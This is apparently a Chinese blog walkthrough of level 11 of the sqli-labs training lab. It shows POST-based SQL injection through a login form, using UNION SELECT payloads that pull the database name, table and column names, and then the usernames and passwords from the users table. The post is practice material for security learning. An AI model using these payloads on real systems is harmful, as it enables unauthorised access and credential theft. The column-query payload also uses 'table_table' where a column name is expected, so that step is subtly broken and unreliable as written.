sqli-labs(less-11)

发布于:2022-12-17 ⋅ 阅读:(682) ⋅ 点赞:(0)

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

 less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

4.查表名

5.查段名

6.查数据

7.用查到的数据Dumb登录 


 less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

aadmin' union select user(),database()-- 

4.查表名

aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--

5.查段名

aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_table='users'--

6.查数据

aadmin' union select 1,group_concat(username,':',password) from users --

7.用查到的数据Dumb登录 


网站公告

今日签到

点亮在社区的每一天
去签到